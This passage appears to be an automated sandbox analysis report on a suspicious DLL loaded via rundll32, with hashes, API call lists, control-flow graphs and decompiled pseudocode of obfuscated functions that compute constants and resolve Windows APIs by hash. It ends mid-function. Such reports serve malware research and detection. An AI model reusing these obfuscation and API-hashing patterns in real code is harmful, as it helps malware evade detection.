                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 2bea7b-2beb35 call 2bcf25 call 2b2d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E002BEA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t41;
                                                                                                                      				intOrPtr* _t50;
                                                                                                                      				void* _t51;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				void* _t60;
                                                                                                                      
                                                                                                                      				_t60 = __edx;
                                                                                                                      				E002BCF25(_t41);
                                                                                                                      				_v16 = 0xd33285;
                                                                                                                      				_v16 = _v16 + 0xd9cb;
                                                                                                                      				_v16 = _v16 | 0xd94823ae;
                                                                                                                      				_v16 = _v16 ^ 0xd9d95ea2;
                                                                                                                      				_v8 = 0xf9f040;
                                                                                                                      				_v8 = _v8 ^ 0x026675a4;
                                                                                                                      				_t52 = 0x46;
                                                                                                                      				_v8 = _v8 / _t52;
                                                                                                                      				_t53 = 0x2b;
                                                                                                                      				_v8 = _v8 / _t53;
                                                                                                                      				_v8 = _v8 ^ 0x000f054e;
                                                                                                                      				_v12 = 0x255c2b;
                                                                                                                      				_v12 = _v12 ^ 0x0b9b7933;
                                                                                                                      				_v12 = _v12 + 0xffff1ebc;
                                                                                                                      				_v12 = _v12 ^ 0x0bb758ac;
                                                                                                                      				_t50 = E002B2D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
                                                                                                                      				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
                                                                                                                      				return _t51;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 002BEB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 70b902c0c8d22d8d979f5172c231cbe682f147a3ed3d0eed36f05227745a0748
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 4F116736D00208FBDB14DEE6D94A8DFBFB5EB85310F108099F614A6251E7714B65AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 225 10001b80-10001b90 226 10001b92-10001b97 225->226 227 10001b9c-10001ba8 225->227 228 10001c9c-10001c9f 226->228 229 10001c04-10001c66 227->229 230 10001baa-10001bb5 227->230 231 10001c74-10001c91 VirtualProtect 229->231 232 10001c68-10001c71 229->232 233 10001bb7-10001bbe 230->233 234 10001bfa-10001bff 230->234 235 10001c93-10001c95 231->235 236 10001c97 231->236 232->231 237 10001bc0-10001bce 233->237 238 10001be2-10001bf4 VirtualFree 233->238 234->228 235->228 236->228 237->238 239 10001bd0-10001be0 237->239 238->234 239->234 239->238
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction ID: 18a5c97ed4e363b13208c3a7f4c71130bffb6d6a25a92aa7c7569a15449bf2a4
                                                                                                                      • Opcode Fuzzy Hash: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction Fuzzy Hash: 7141B9746001099FEB48CF58C490FA9B7B2FB88350F14C659E91A9F395D731EE41CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 2c679c-2c6863 call 2bcf25 call 2b2d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E002C679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t40;
                                                                                                                      				int _t46;
                                                                                                                      				WCHAR* _t50;
                                                                                                                      
                                                                                                                      				_push(_a64);
                                                                                                                      				_t50 = __ecx;
                                                                                                                      				_push(_a60);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a48);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t40);
                                                                                                                      				_v24 = 0x639852;
                                                                                                                      				_v20 = 0;
                                                                                                                      				_v12 = 0x9647c4;
                                                                                                                      				_v12 = _v12 + 0x4343;
                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                      				_v12 = _v12 ^ 0x0009af77;
                                                                                                                      				_v16 = 0x17e0ca;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x000f0fb4;
                                                                                                                      				_v8 = 0x429f7b;
                                                                                                                      				_v8 = _v8 + 0xffff27c2;
                                                                                                                      				_v8 = _v8 + 0xb08b;
                                                                                                                      				_v8 = _v8 ^ 0x004b6691;
                                                                                                                      				E002B2D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
                                                                                                                      				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
                                                                                                                      				return _t46;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 002C685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: e9aaaf208385ce4e1a09109a4024b1047fd45caa25ddecdcd7203d1e3f0f57ab
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 2221E772900248BBCF119F95CD09CDFBFB9EF99714F008189FA1466120D7B68A64EFA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 277 2c3cbb-2c3d40 call 2b2d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C3CBB() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _t37;
                                                                                                                      
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0x868838;
                                                                                                                      				_v16 = 0xb6c7ac;
                                                                                                                      				_t37 = 0x79;
                                                                                                                      				_v16 = _v16 * 0x7d;
                                                                                                                      				_v16 = _v16 ^ 0x593c5b8b;
                                                                                                                      				_v8 = 0x23929;
                                                                                                                      				_v8 = _v8 | 0xd856564b;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 >> 1;
                                                                                                                      				_v8 = _v8 ^ 0x67f2afdd;
                                                                                                                      				_v12 = 0x42ac5b;
                                                                                                                      				_v12 = _v12 / _t37;
                                                                                                                      				_v12 = _v12 ^ 0x0009f0c4;
                                                                                                                      				E002B2D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 002C3D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: c081b42571ba014d478c98d680b2a96988786ea213f6e823a3b828bf1f00c633
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: 4601E2B6D0120CFBDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 297 2cfc96-2cfd28 call 2bcf25 call 2b2d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E002CFC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t40;
                                                                                                                      				signed int _t42;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E002BCF25(_t32);
                                                                                                                      				_v8 = 0x178fa1;
                                                                                                                      				_v8 = _v8 | 0x2f4d5c19;
                                                                                                                      				_v8 = _v8 + 0xda24;
                                                                                                                      				_t42 = 0x35;
                                                                                                                      				_v8 = _v8 / _t42;
                                                                                                                      				_v8 = _v8 ^ 0x00e923af;
                                                                                                                      				_v16 = 0xca5f26;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x97c71065;
                                                                                                                      				_v12 = 0xeb54f5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x0000b8cd;
                                                                                                                      				E002B2D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
                                                                                                                      				_t40 = lstrcmpiW(_a12, _a4); // executed
                                                                                                                      				return _t40;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 002CFD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 4740e654bad4d1fd8f466bf7c748092326eba03b21d5d9c711756325b8ef8bdb
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: D9010276D00208BFDF05EFE4C84A89EBBB1AB44304F108098EA146A250DBB69B649F40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002D1B54() {
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v72;
				intOrPtr _v76;
				char _v84;
				char _v96;
				signed int _v100;
				char _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v128;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				unsigned int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				unsigned int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				unsigned int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _t1099;
				signed int _t1109;
				void* _t1121;
				signed int _t1139;
				signed int _t1147;
				signed int _t1167;
				void* _t1171;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1180;
				signed int _t1181;
				signed int _t1182;
				signed int _t1183;
				signed int _t1184;
				signed int _t1185;
				signed int _t1186;
				signed int _t1187;
				signed int _t1272;
				signed int _t1273;
				signed int _t1279;
				void* _t1281;
				signed int _t1288;
				signed int _t1309;
				void* _t1311;
				void* _t1314;
				void* _t1315;
				void* _t1316;

				_t1311 = (_t1309 & 0xfffffff8) - 0x250;
				_v116 = _v116 & 0x00000000;
				_v120 = 0xa23e30;
				_v592 = 0x3a1cca;
				_v592 = _v592 * 0x70;
				_t1281 = 0x5cbbc19;
				_v592 = _v592 ^ 0x2f3849e0;
				_t9 =  &_v592; // 0x2f3849e0
				_t1172 = 6;
				_v592 =  *_t9 / _t1172;
				_v592 = _v592 ^ 0x090e23e8;
				_v236 = 0x87b10f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 ^ 0xb10f0000;
				_v516 = 0x461834;
				_v516 = _v516 ^ 0x02f635e2;
				_t1173 = 0x21;
				_v516 = _v516 / _t1173;
				_v516 = _v516 | 0x474321ea;
				_v516 = _v516 ^ 0x4757fbfb;
				_v216 = 0xd2c0b1;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x006de7f5;
				_v480 = 0xeb5e0b;
				_v480 = _v480 + 0xffffa941;
				_t1272 = 0x43;
				_v480 = _v480 / _t1272;
				_v480 = _v480 | 0xc166e67d;
				_v480 = _v480 ^ 0xc1675dee;
				_v488 = 0xe6f87d;
				_v488 = _v488 ^ 0x80ff234c;
				_v488 = _v488 ^ 0x24b1b453;
				_v488 = _v488 + 0xa7fe;
				_v488 = _v488 ^ 0xa4a91779;
				_v276 = 0x5f17b9;
				_v276 = _v276 << 3;
				_v276 = _v276 ^ 0x02fd9db5;
				_v344 = 0x4c006c;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 | 0xcdf796ee;
				_v344 = _v344 ^ 0xcdf61224;
				_v200 = 0x45df15;
				_v200 = _v200 + 0x6060;
				_v200 = _v200 ^ 0x004b7917;
				_v208 = 0xca7f26;
				_v208 = _v208 ^ 0x913d6520;
				_v208 = _v208 ^ 0x91fcdbd5;
				_v588 = 0xb1f4cb;
				_v588 = _v588 + 0x6758;
				_t87 =  &_v588; // 0x6758
				_v588 =  *_t87 * 0x4f;
				_v588 = _v588 ^ 0x925d082a;
				_v588 = _v588 ^ 0xa5589431;
				_v508 = 0xf7df1e;
				_v508 = _v508 + 0xd118;
				_v508 = _v508 + 0xffffbf54;
				_v508 = _v508 + 0x17fc;
				_v508 = _v508 ^ 0x00fe0a31;
				_v380 = 0x7e02fb;
				_v380 = _v380 + 0xf589;
				_v380 = _v380 ^ 0x91d98710;
				_v380 = _v380 ^ 0x91abdaf6;
				_v504 = 0xb08a0e;
				_v504 = _v504 * 0x77;
				_t1174 = 0x77;
				_v504 = _v504 / _t1174;
				_v504 = _v504 >> 2;
				_v504 = _v504 ^ 0x002dfbde;
				_v372 = 0x813d4a;
				_t1175 = 0x6c;
				_v372 = _v372 * 0x4a;
				_v372 = _v372 / _t1175;
				_v372 = _v372 ^ 0x005da134;
				_v484 = 0x855e16;
				_v484 = _v484 ^ 0xbfb8346c;
				_t1176 = 0x5f;
				_v484 = _v484 / _t1176;
				_v484 = _v484 + 0xfcf8;
				_v484 = _v484 ^ 0x02037e81;
				_v240 = 0xec674d;
				_v240 = _v240 | 0xfc3e6c49;
				_v240 = _v240 ^ 0xfcfddb47;
				_v364 = 0x61d0f9;
				_v364 = _v364 + 0xffffb344;
				_v364 = _v364 / _t1272;
				_v364 = _v364 ^ 0x000105b5;
